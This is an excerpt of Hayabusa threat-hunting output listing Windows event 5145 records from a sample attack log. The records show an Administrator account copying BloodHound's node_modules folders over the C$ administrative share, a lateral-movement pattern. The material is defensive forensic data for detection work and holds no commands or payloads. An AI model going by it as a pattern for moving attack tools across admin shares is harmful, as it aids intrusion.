0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map | IP Addr: 10.0.2.15 | LID: 
